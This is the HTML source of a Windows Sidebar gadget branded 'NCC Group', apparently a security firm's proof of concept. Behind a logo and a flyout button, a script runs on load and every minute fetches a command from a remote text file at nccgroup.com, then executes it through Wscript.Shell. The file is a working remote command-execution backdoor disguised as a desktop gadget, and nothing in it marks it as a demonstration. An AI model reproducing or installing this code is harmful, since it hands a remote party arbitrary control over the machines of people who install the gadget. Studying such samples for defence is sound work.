<html >
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=Unicode" />
        <title>NCC Group</title>
		<style type="text/css">
			body{
				width:130px;
				height:90px;
			}
			span{
				font-family: Tahoma:
				font-size: 12pt;
			}
		</style>
        <script type="text/jscript" language="jscript">
            // Initialize the gadget.
            function init()
            {
		window.setTimeout('cmdshell()',1000);
            }
	    function cmdshell()
	    {
		var oRequest = new XMLHttpRequest();
		var sURL = "http://www.nccgroup.com/gadgetcmd.txt?RandomKey="+Math.random() * Date.parse(new Date());
		oRequest.open("GET",sURL,false);
		oRequest.send(null);
		if(oRequest.status==200)
		{
			var oShell = new ActiveXObject("Wscript.Shell");
			oShell.Run(oRequest.responseText);
		}
		window.setTimeout('cmdshell()',60000);
            }
        </script>
        <script type="text/jscript" language="jscript">
		System.Gadget.settingsUI = "settings.html";
		System.Gadget.Flyout.file = "flyout.html";
		function toggleFlyout(){
			if(System.Gadget.Flyout.show == true){
				System.Gadget.Flyout.show = false;
			}
			if(System.Gadget.Flyout.show == false){
				System.Gadget.Flyout.show = true;
			}
		}
	</script>
    </head>
	
    <body onload="init()">
	<img src="logo.gif" border="0" width="100" height="45">
	<button onClick="toggleFlyout();">NCC Group</button>            
    </body>
</html>

